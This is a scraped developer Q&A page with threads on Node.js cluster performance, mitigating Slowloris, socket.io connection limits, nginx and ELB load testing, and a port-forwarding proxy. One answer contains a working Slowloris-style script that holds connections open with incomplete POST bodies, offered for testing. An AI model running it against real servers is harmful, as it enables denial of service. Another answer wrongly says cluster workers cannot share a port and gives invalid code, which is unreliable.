NodeJS cluster, Is it really needed?

NodeJS cluster, Is it really needed? - javascript

I decided that i want to investigate what is the best possible way to handle big amount of traffic with NodeJS server, i did a small test on 2 digital ocean servers which has 1GB RAM / 2 CPUs
No-Cluster server code:
// Include Express
var express = require('express');
// Create a new Express application
var app = express();
// Add a basic route – index page
app.get('/', function (req, res) {
res.redirect('http://www.google.co.il');
});
// Bind to a port
app.listen(3000);
console.log('Application running');
Cluster server code:
// Include the cluster module
var cluster = require('cluster');
// Code to run if we're in the master process
if (cluster.isMaster) {
// Count the machine's CPUs
var cpuCount = require('os').cpus().length;
// Create a worker for each CPU
for (var i = 0; i < cpuCount; i += 1) {
cluster.fork();
}
// Code to run if we're in a worker process
} else {
// Include Express
var express = require('express');
// Create a new Express application
var app = express();
// Add a basic route – index page
app.get('/', function (req, res) {
res.redirect('http://www.walla.co.il');
});
// Bind to a port
app.listen(3001);
console.log('Application running #' + cluster.worker.id);
}
And i sent stress test requests to those servers, i excepted that the cluster server will handle more requests but it didn't happen, both servers crashed on the same load, although 2 node services were running on the cluster and 1 service on the non-cluster.
Now i wonder why ? Did i do anything wrong?
Maybe something else is making the servers reach its breakpoint? both servers crashed at ~800 rps

Now i wonder why ? did i do anything wrong?
Your test server doesn't do anything other than a res.redirect(). If your request handlers use essentially no CPU, then you aren't going to be CPU bound at all and you won't benefit from involving more CPUs. Your cluster will be bottlenecked at the handling of incoming connections which is going to be roughly the same with or without clustering.
Now, add some significant CPU usage to your request handler and you should get a different result.
For example, change to this:
// Add a basic route – index page
app.get('/', function (req, res) {
// spin CPU for 200ms to simulate using some CPU in the request handler
let start = Date.now();
while (Date.now() - start < 200) {}
res.redirect('http://www.walla.co.il');
});
Running tests is a great thing, but you have to be careful what exactly you're testing.

What #jfriend00 says is correct; you aren't actually doing enough heavy lifting to justify this, however, you're not actually sharing the load. See here:
app.listen(3001);
You can't bind two services onto the same port and have the OS magically load-balance them[1]; try adding an error handler on app.listen() and see if you get an error, e.g.
app.listen(3001, (err) => err ? console.error(err));
If you want to do this, you'll have to accept everything in your master, then instruct the workers to do the task, then pass the results back to the master again.
It's generally easier not to do this in your Node program though; your frontend will still be the limiting factor. An easier (and faster) way may be to put a special purpose load-balancer in front of multiple running instances of your application (i.e. HAProxy or Nginx).
[1]: That's actually a lie; sorry. You can do this by specifying SO_REUSEPORT when doing the initial bind call, but you can't explicitly specify that in Node, and Node doesn't specify it for you...so you can't in Node.

Related

How to mitigate Slowloris in Node.js?

Update
_ https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/ _.
Update Friday, 13th 2018:
I managed to convince the Node.js core team about setting a CVE for that.
The fix — new defaults and probably new API — will be there in 1 or 2 weeks.
Mitigate means to quiet an attack.
Everybody knows Slowloris:
HTTP Header or POST Data characters get transmitted slowly to block the socket.
Scaled that makes a much easier DoS attack.
**In NGINX the mitigation is inbuilt:**
> Closing Slow Connections
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
Since there is no inbuilt way to work on the header in the HTTP Server in Node.js.
I came to the question, if I can combine net and a HTTP Server for mitigating Slowloris .
The idea to `destroy` the `connection` in case of `Slowloris` is this.
http.createServer(function(req, res) {
var timeout;
net.on('data', function(chunk) {
clearTimeout(timeout);
timeout = setTimeout(function() {
req.connection.destroy();
}, 100);
};
};
The problem I can see is, both services have to listen on the same Socket on Port 80 and 443.
Do — not — know how to tackle this.
It is possible to transfer requests and responses from net to HTTP-Server and back.
But this takes 2 sockets for 1 incoming message.
And 2 sockets for 1 outgoing message.
So this is — not — feasible in sense of high available server.
I have no clue.
What can the world do to get rid of this scourge?
CVE for Apache Tomcat.
This is a serious security threat.
I think this want to be solved on C or C++ base.
I cannot write these real programmer languages.
But all of us are helped, if somebody pushes this on Github.
Because the community there once deleted my thread about mitigating Slowloris.

The best way to mitigate this issue, as well as a number of other issues, is to place a proxy layer such as nginx or a firewall between the node.js application and the internet.
If you're familiar with the paradigms behind many design and programming approached, such as OOP, you will probably recognize the importance behind "separation of concerns".
The same paradigm holds true when designing the infrastructure or the way clients can access data.
The application should have only one concern: handle data operations (CRUD). This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc').
Other concerns should be placed in a separate layer, such as an nginx proxy layer.
For example, nginx will often be concerned with routing traffic to your application / load balancing. This will include security concerns related to network connections, such as SSL/TLS negotiations, slow clients, etc'.
An extra firewall might (read: should) be implemented to handle additional security concerns.
The solution for your issue is simple, do not directly expose the node.js application to the internet, use a proxy layer - it exists for a reason.

I think you're taking a wrong approach for this vulnerability.
This doesn't deal with DDOS attack (Distributed Denial of Service) where many IPs are used, and when you need to continue serving some machines that are inside the same firewall as machines involved in the attack.
Often machines used in DDOS aren't real machines that have been taken over (maybe vitualized or with software to do it from different IPs).
When a DDOS against a large target starts, per-IP throttling may ban all machines from the same fire-walled LAN.
To continue providing service in the face of a DDOS, you really need to block requests based on common elements of the request itself, not just IP. security.se may be the best forum for specific advice on how to do that.
Unfortunately, DOS attacks, unlike XSRF, don't need to originate from real browsers so any headers that don't contain closely-held and unguessable nonces can be spoofed.
The recommendation: To prevent this issue, you had to have a good firewall policies against DDos attacks and massive denial services.
BUT! If you want to do something to test a Denial service with node.js, you can use this code (use only for test purposes, not for a production environment)
var net = require('net');
var maxConnections = 30;
var connections = [];
var host = "127.0.0.1";
var port = 80;
function Connection(h, p)
{
this.state = 'active';
this.t = Date.now();
this.client = net.connect({port:p, host:h}, () => {
process.stdout.write("Connected, Sending... ");
this.client.write("POST / HTTP/1.1\r\nHost: "+host+"\r\n" +
"Content-Type: application/x-www-form-urlenconded\r\n" +
"Content-Length: 385\r\n\r\nvx=321&d1=fire&l");
process.stdout.write("Written.\n");
});
this.client.on('data', (data) => {
console.log("\t-Received "+data.length+" bytes...");
this.client.end();
});
this.client.on('end', () => {
var d = Date.now() - this.t;
this.state = 'ended';
console.log("\t-Disconnected (duration: " +
(d/1000).toFixed(3) +
" seconds, remaining open: " +
connections.length +
").");
});
this.client.on('error', () => {
this.state = 'error';
});
connections.push(this);
}
setInterval(() => {
var notify = false;
// Add another connection if we haven't reached
// our max:
if(connections.length < maxConnections)
{
new Connection(host, port);
notify = true;
}
// Remove dead connections
connections = connections.filter(function(v) {
return v.state=='active';
});
if(notify)
{
console.log("Active connections: " + connections.length +
" / " + maxConnections);
}
}, 500);

It is as easy as this.
var http = require('http');
var server = http.createServer(function(req,res) {
res.send('Now.')
})
server.setTimeout(10);
server.listen(80, '127.0.0.1');
server.setTimeout([msecs][, callback])
By default, the Server's timeout value is 2 minutes, and sockets are
destroyed automatically if they time out.
https://nodejs.org/api/http.html#http_server_settimeout_msecs_callback
Tested with.
var net = require('net');
var client = new net.Socket();
client.connect(80, '127.0.0.1', function() {
setInterval(function() {
client.write('Hello World.');
},10000)
});
This is only the second to best solution.
Since legit connections are terminated also.

NodeJS cluster don't recognize the master worker in clustering

I'm trying to cluster my node server so I was just testing the example code below.
The below code worked the first time I tried it. I created a new js file and ran the code - worked flawlessly.
Then I deleted the 'practice' js file and moved exactly the same code into my server file to implement it.
Now it won't ever recognize the first worker as the master worker... I have no idea what might have gone wrong.
I have tried setting process.env.NODE_UNIQUE_ID to undefined but it won't reset the master worker! so every time I run this code, I get "Application running!" without "worker loop" which should show everytime it loops through creating a worker, meaning it is not recognising the first worker as the master worker.
Does anyone know what the problem might be?
const cluster = require('cluster');
if (cluster.isMaster) {
var cpuCount = require('os').cpus().length;
for (var i = 0; i < cpuCount; i ++) {
cluster.fork();
console.log(`worker loop ${i}`)
}
} else {
var express = require('express');
var app = express();
app.get('/', function (req, res) {
res.send('Hello World!');
});
app.listen(3000);
console.log('Application running!');
}

ENOBUFS when creating to many sockets with socket.io

What I am trying to do:
I write a node.js client/server application which uses persistent websocket connections (no longpolling). I want to stress test my server in order to tune it's performance and know the limits so that I can block new incoming connections due to overloads. Unfortunately I am stuck at one specific amount of socket connections every time, thus I think it may be related to OS or node settings.
The problem:
I have one client which creates 10k socket connections and the server can handle this perfectly fine. When I start the second client with another 10k connections I start getting the following errors on my client application once the server helds 14k concurrent connections:
engine.io-client:socket socket close with reason: "transport error"
+0ms engine.io-client:socket socket error {"type":"TransportError","description":{"code":"ENOBUFS","errno":"ENOBUFS","syscall":"connect","address":"127.0.0.1","port":5433,"type":"error","target":{"domain":null,"_events":{},"_eventsCount":4,"_socket":null,"_ultron":null,"_closeReceived":false,"bytesReceived":0,"readyState":0,"supports":{"binary":true},"extensions":{},"_isServer":false,"url":"ws://127.0.0.1:5433/socket.io/?EIO=3&transport=websocket","protocolVersion":13,"binaryType":"buffer"}}}
+0ms
My client1.js and client2.js look like this:
function createClient(){
var socket = require('socket.io-client')('http://127.0.0.1:5433', {transports:['websocket']});
socket.connect();
// Send a bit data every 2.5s to simulate a bit traffic
setInterval(function () {
socket.emit("sessionCheck", "ok");
}, 2500);
}
var clients=0;
var id =setInterval(function() {
createClient();
clients++;
if(clients >= 10000)
clearInterval(id);
}, 1);
My server.js looks like this:
var http = require('http');
var httpServer = http.createServer(handler);
var io = require('socket.io')(httpServer, {pingTimeout: 60 * 1000, pingInterval: 5 * 1000});
io.on('connection', function (socket) {
socket.on('sessionCheck', function(data){onSessionCheck(socket,data)});
});
setInterval(function(){
console.log(io.engine.clientsCount + " websockets are connected");
}, 5000);
httpServer.listen(5433, "0.0.0.0", 5000); // port, hostname, backlog
console.log("server running now...");
function onSessionCheck(){
//console.log("Incoming check");
}
function handler (req, res) {
fs.readFile(__dirname + '/index.html',
function (err, data) {
if (err) {
res.writeHead(500);
return res.end('Error loading index.html');
}
res.writeHead(200);
res.end(data);
})
};

You said in Slack you already know about –max-old-space-size and you tried it and it did not help. Now I can confirm that using this option (i tried values 2048-65000) prevents me from getting more than ~18-20k concurrent connections from one server to one server. Removing the option gives me ~29500 concurrent connections. I use $20 DigitalOcean vps (2 GB, 2 core) and 29500 takes all the free memory of my server - that is why i cant have more connections for now.
UPDATE
Linux?
Try check tuning the following values on server:
net.nf_conntrack_max (i use 65536)
net.netfilter.nf_conntrack_max (i use 65536)
cat /proc/sys/fs/nr_open gives 1048576 for me
cat /proc/sys/fs/file-nr gives 5056 0 2097152 for me
cat /proc/sys/fs/file-max gives 2097152 for me
net.ipv4.ip_local_port_range (i use 2000 65535)
net.core.somaxconn (i use 65000)
ulimit -n gives me 1048576
This may give you an inkling how to set the params https://easyengine.io/tutorials/linux/sysctl-conf/
Maybe you should check some of the values for your client-servers (like ip_local_port_range, file-nr, ulimit -n)
You might want to check logs (/var/log/messages, /var/log/syslog, dmesg) as well.
I finally got 34469 connections and then oom-killer killed node on my client machine

The solution is, as I already assumed, an option in windows (MaxUserPort), which you can change in the regedit. Check the MSDN description to learn more about it: https://support.microsoft.com/en-us/kb/196271 . You can set it to a maxmimum value of 65534.

Why increasing worker_connections in Nginx makes the application slower in node.js cluster?

I'm transforming my application to node.js cluster which I hope it would boost the performance of my application.
Currently, I'm deploying the application to 2 EC2 t2.medium instances. I have Nginx as a proxy and ELB.
This is my express cluster application which is pretty standard from the documentation.
var bodyParser = require('body-parser');
var cors = require('cors');
var cluster = require('cluster');
var debug = require('debug')('expressapp');
if(cluster.isMaster) {
var numWorkers = require('os').cpus().length;
debug('Master cluster setting up ' + numWorkers + ' workers');
for(var i = 0; i < numWorkers; i++) {
cluster.fork();
}
cluster.on('online', function(worker) {
debug('Worker ' + worker.process.pid + ' is online');
});
cluster.on('exit', function(worker, code, signal) {
debug('Worker ' + worker.process.pid + ' died with code: ' + code + ', and signal: ' + signal);
debug('Starting a new worker');
cluster.fork();
});
} else {
// Express stuff
}
This is my Nginx configuration.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '1024'
nginx::keepalive_timeout: '65'
I have 2 CPUs on Nginx server.
This is my before performance.
I get 1,500 request/s which is pretty good. Now I thought I would increase the number of connections on Nginx so I can accept more requests. I do this.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '2048'
nginx::keepalive_timeout: '65'
And this is my after performance.
Which I think it's worse than before.
I use gatling for performance testing and here's the code.
import io.gatling.core.Predef._
import io.gatling.http.Predef._
import scala.concurrent.duration._
class LoadTestSparrowCapture extends Simulation {
val httpConf = http
.baseURL("http://ELB")
.acceptHeader("application/json")
.doNotTrackHeader("1")
.acceptLanguageHeader("en-US,en;q=0.5")
.acceptEncodingHeader("gzip, defalt")
.userAgentHeader("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0")
val headers_10 = Map("Content-Type" -> "application/json")
val scn = scenario("Load Test")
.exec(http("request_1")
.get("/track"))
setUp(
scn.inject(
atOnceUsers(15000)
).protocols(httpConf))
}
I deployed this to my gatling cluster. So, I have 3 EC2 instances firing 15,000 requests in 30s to my application.
The question is, is there anything I can do to increase my performance of my application or I just need to add more machines?
The route that I'm testing is pretty simple, I get the request and send it off to RabbitMQ so it can be processed further. So, the response of that route is pretty fast.

You've mentioned that you are using AWS and in the front of your EC2 instances in ELB. As I see you are getting 502 and 503 status codes. These can be sent from ELB or your EC2 instances. Make sure that when doing the load-test you know from where the errors are coming from. You can check this in AWS console in ELB CloudWatch metrics.
Basically HTTPCode_ELB_5XX means your ELB sent 50x. On other hand HTTPCode_Backend_5XX sent 50x. You can also verify that in the logs of ELB. Better explanation of errors of ELB you can find here.
To load-test on AWS you should definitely read this. Point is that ELB is just another set of machines, which needs to scale if your load increases. Default scaling strategy is (cited from the section "Ramping Up Testing"):
Once you have a testing tool in place, you will need to define the growth in the load. We recommend that you increase the load at a rate of no more than 50 percent every five minutes.
That means when you start at some number of concurrent users, lets say 1000, per default you should increase only up to 1500 within 5 minutes. This will guarantee that ELB will scale with load on your servers. Exact numbers may vary and you have to test them on your own. Last time I've tested it sustained load of 1200 req./s w/o an issue and then I've started to receive 50x. You can test it easily running ramp-up scenario from X to Y users from single client and waiting for 50x.
Next very important thing (from part "DNS Resoultion") is:
If clients do not re-resolve the DNS at least once per minute, then the new resources Elastic Load Balancing adds to DNS will not be used by clients.
In short it means that you have to guarantee that TTL in DNS is respected, or that your clients re-resolve and rotate DNS IPs which they received by doing DNS lookup to guarantee round-robin fashion to distributing load. If not (e.g. testing from only one client, not your case) you can skew the results by overloading one instance of ELB by targeting all the traffic only to one instance. That means ELB will not scale at all.
Hope it will help.

Node.js CPU intensive high load for a script that forwards data from port to port

I have a problem with codding a node.js program that forwards traffic from an port to another. The scenario goes like this. I forward all traffic from port 55555 to a sshtunnel that have a SOCKS5 opened on port 44444. The thing is that everything works smoothly, until i run the command htop -d 1 and i see high load when i am visiting 2-3 sites simoultaniously. If i go trough SOCKS5 SOCKS sshtunnel directly i see load at peek 1% of a core, but with node.js i se 22% 26% 60% 70% even 100% sometimes. What is happening, why is this? I mean think about when i open like 1000 of those what would happen!!
Here is my first try (proxy1.js) :
var net = require('net');
require('longjohn');
var regex = /^[\x09\x0A\x0D\x20-\x7E]+$/;
var regexIP = /^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/;
// parse "80" and "localhost:80" or even "42mEANINg-life.com:80"
var addrRegex = /^(([a-zA-Z\-\.0-9]+):)?(\d+)$/;
var addr = {
from: addrRegex.exec(process.argv[2]),
to: addrRegex.exec(process.argv[3])
};
if (!addr.from || !addr.to) {s=
console.log('Usage: <from> <to>');
}
net.createServer(function(from) {
var to = net.createConnection({
host: addr.to[2],
port: addr.to[3]
});
// REQUESTS BEGIN
from.on('data', function(data){
});
from.on('end', function(end){
});
from.on('close', function(close){
});
// error handeling
from.on('error', function(error)
{
});
from.pipe(to);
// REQUESTS END
// RESPONSES BEGIN
to.on('data', function(data){
});
to.on('end', function(end){
});
to.on('close', function(close){
});
to.on('error', function(error)
{
});
to.pipe(from);
// RESPONSES END
}).listen(addr.from[3], addr.from[2]);
Here is my second try (proxy2.js) :
var net = require('net');
var sourceport = 55555;
var destport = 62240;
net.createServer(function(s)
{
var buff = "";
var connected = false;
var cli = net.createConnection(destport,"127.0.0.1");
s.on('data', function(d) {
if (connected)
{
cli.write(d);
} else {
buff += d.toString();
}
});
s.on('error', function() {
});
cli.on('connect', function() {
connected = true;
cli.write(buff);
});
cli.on('error', function() {
});
cli.pipe(s);
}).listen(sourceport);
I also tryed to run cpulimit -l 10 nodejs proxy.js 55555 44444 also makes load and it seems like it is oppening new forks, processes ...
cat /etc/issue
Ubuntu 14.04.3 LTS
nodejs --version
v0.10.25
processor
Intel(R) Xeon(R) CPU E3-1246 v3 # 3.50GHz with 8 cores
RAM
32 RAM (that stays free all the time)
Server config :
Why is the load so big?
How can i write the code to not make that load?
Why 'cpulimit -l 10 nodejs proxy.js 55555 44444' dosen't work as expected?
Why node.js is using CPU and not RAM ?
Thanks in advice.

Port is merely a segment in the memory and writing fast on ports may load the CPU because it may create too many async IO requests. However these requests are even though they are IO bound are indirectly CPU bound.
To avoid this problem you may have to limit too many connection requests by streaming data. Rather than sending 1000 small requests, make 100 large requests.
I'm not sure how to solve this or what exactly is happening. May be socket.io with streaming can help.

We Keep Coding

JavaScript is the programming language of the Web.